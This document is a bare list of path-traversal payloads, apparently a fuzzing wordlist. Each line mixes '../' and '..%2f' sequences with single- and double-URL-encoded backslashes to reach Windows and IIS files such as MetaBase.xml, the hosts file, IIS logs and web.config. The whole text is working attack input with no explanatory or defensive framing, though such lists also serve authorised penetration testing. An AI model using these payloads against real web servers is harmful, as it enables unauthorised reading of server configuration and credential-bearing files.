/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f%SystemRoot%\System32\inetsrv\MetaBase.xml
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\System32\drivers\etc\hosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\inetpub\wwwroot\web.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\System32\drivers\etc\hosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\inetpub\wwwroot\web.config
/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/..%2f..%2f/..%2f..%2fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
/..%2f..%2f/..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/..%2f..%2f/..%2f..%2fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
/..%2f..%2f/..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
/..%2f..%2f/..%2f..%2fC:\Windows\System32\drivers\etc\hosts
/..%2f..%2f/..%2f..%2fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
/..%2f..%2f/..%2f..%2fC:\inetpub\wwwroot\web.config
/../..//../../%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
/../..//../../%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
/../..//../../%SystemRoot%\System32\inetsrv\MetaBase.xml
/../..//../..//../..//../..//../../%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
/../..//../..//../..//../..//../../%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
/../..//../..//../..//../..//../../%SystemRoot%\System32\inetsrv\MetaBase.xml
/../..//../..//../..//../..//../..//../..//../..//../../%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
/../..//../..//../..//../..//../..//../..//../..//../../%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
/../..//../..//../..//../..//../..//../..//../..//../../%SystemRoot%\System32\inetsrv\MetaBase.xml
/../..//../..//../..//../..//../..//../..//../..//../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/../..//../..//../..//../..//../..//../..//../..//../../C:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
/../..//../..//../..//../..//../..//../..//../..//../../C:%255cinetpub%255cwwwroot%255cweb.config
/../..//../..//../..//../..//../..//../..//../..//../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/../..//../..//../..//../..//../..//../..//../..//../../C:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
/../..//../..//../..//../..//../..//../..//../..//../../C:%5cinetpub%5cwwwroot%5cweb.config
/../..//../..//../..//../..//../..//../..//../..//../../C:\Windows\System32\drivers\etc\hosts
/../..//../..//../..//../..//../..//../..//../..//../../C:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
/../..//../..//../..//../..//../..//../..//../..//../../C:\inetpub\wwwroot\web.config
/../..//../..//../..//../..//../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/../..//../..//../..//../..//../../C:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
/../..//../..//../..//../..//../../C:%255cinetpub%255cwwwroot%255cweb.config
/../..//../..//../..//../..//../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/../..//../..//../..//../..//../../C:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
/../..//../..//../..//../..//../../C:%5cinetpub%5cwwwroot%5cweb.config
/../..//../..//../..//../..//../../C:\Windows\System32\drivers\etc\hosts
/../..//../..//../..//../..//../../C:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
/../..//../..//../..//../..//../../C:\inetpub\wwwroot\web.config
/../..//../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/../..//../../C:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
/../..//../../C:%255cinetpub%255cwwwroot%255cweb.config
/../..//../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/../..//../../C:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
/../..//../../C:%5cinetpub%5cwwwroot%5cweb.config
/../..//../../C:\Windows\System32\drivers\etc\hosts
/../..//../../C:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
/../..//../../C:\inetpub\wwwroot\web.config
